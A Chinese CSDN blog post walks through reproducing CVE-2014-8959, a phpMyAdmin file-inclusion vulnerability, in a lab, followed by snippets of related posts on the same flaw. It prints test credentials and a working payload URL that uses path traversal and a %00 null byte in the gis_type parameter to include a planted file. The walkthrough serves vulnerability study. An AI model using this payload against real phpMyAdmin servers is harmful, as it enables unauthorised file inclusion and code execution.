phpmyadmin-文件包含(CVE-2014-8959)

最新推荐文章于 2024-01-26 08:46:38 发布
最新推荐文章于 2024-01-26 08:46:38 发布
阅读量598 收藏 12
点赞数 7
文章标签: 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135333952
版权
文章揭示了一个phpmyadmin中的文件包含漏洞,可通过二次编码绕过检查,允许用户包含根目录下的恶意文件。详细介绍了使用已知MySQL凭证登录、截断漏洞配合及构造URL来重现该漏洞的过程。
摘要由CSDN通过智能技术生成

漏洞描述:

其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞

1.已知MySQL用户名和密码登录到phpmyadmin

2.需要截断漏洞配合才能任意包含

3、包含根目录下1.gif等恶意文件

复现过程:

1.访问ip:port

2.访问登陆页面

/pma/gis_data_editor.php

用户名密码登陆pmatest/pmatest (phpMyAdmin)

3.进入以后 

记录token

4.构造URL,成功执行文件包含

http://ip:port/pma/gis_data_editor.php?token=a4fac8c22ed7b4ceef5f4357f4846d2d&&gis_data[gis_type]=/../../../../1.gif%00

慕筱蚺
关注
phpmyadmin 文件包含CVE-2014-8959
千寻的博客
03-07 1806
- CNNVD编号:`CNNVD-201411-417 ` - 危害等级:` 中危 ` - CVE编号:` CVE-2014-8959 ` - 漏洞类型: `路径遍历 ` - 发布时间:` 2014-11-24 ` - 威胁类型: `远程 `
[CVE-2014-8959] phpmyadmin任意文件包含漏洞分析
weixin_30887919的博客
12-18 463
0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发。 最新的CVE-2014-8959公告中,提到该程序多个版本存在任意文件包含漏洞,影响版本如下: phpMyAdmin 4.0.1 - 4.0.10.6 4.1.1 - 4.1.14.7 4.2.1 - 4.2.12 0x02 补丁分析 看到bobao.360.cn上提到了这个...
文件包含phpmyadmin 文件包含CVE-2014-8959
wj33333的博客
11-15 524
描述: phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。访问http://ip:port/pma即可进入phpmyadmin。http://ip:port/下有测试账号密码,包含根目录下1.gif,其内容为:
[CVE-2014-8959] phpmyadmin任意文件包含漏洞分析(图文)
ai_64的博客
05-09 2120
0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发,这个漏洞有些年头了,看离别歌大佬的博文,感觉有点意思,找来实践一下。 任意文件包含漏洞(CVE-2014-8959)影响版本为4.0.1-4.2.12: 0x02 补丁分析 在文件libraries/gis/pma_gis_factory.php中对$type_lower多加了个判断。 作者...
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)
Au
10-21 2920
phpMyAdmin4.0.3 下载地址http://pan.baidu.com/s/1dEYo9zj 利用条件: 1.登录phpmyadmin后台 2.需要截断   满足第二个条件  php版本必须 <5.3.4      搭建环境 我们在www目录下放置phpinfo.txt 和 phpadmin4.0.3   POC:http://localhost/...
【漏洞复现-phpmyadmin-文件包含CVE-2014-8959
10-14 2813
phpmyadmin-文件包含】鸡肋
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-05
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
CVE-2014-8959 phpmyadmin 文件包含漏洞
weixin_51559599的博客
11-15 224
是空字节,它可以用来绕过一些字符串处理函数和文件检查。
phpmyadmin-文件包含漏洞代码审计过程(超详细)
最新发布
qq_59020256的博客
01-26 1277
phpmyadmin-文件包含漏洞。
总结分析 | 基于phpmyadmin的渗透测试
小司机的奥拓
09-22 3125
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 3万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
Xray捡洞中的高频漏洞
m0_49936858的博客
08-12 1万+
用 X-Ray 刷洞发现一些出现频率高的漏洞,把漏洞原理和利用方式稍作整理,按照危害排名,低危漏洞可以收集一些信息然后深度利用变高危。
phpmyadmin后台文件包含漏洞分析
nareku的博客
04-10 6031
前言 在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
phpMyAdmin要嵌入到已有的界面
bjx18356163055的博客
02-13 496
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值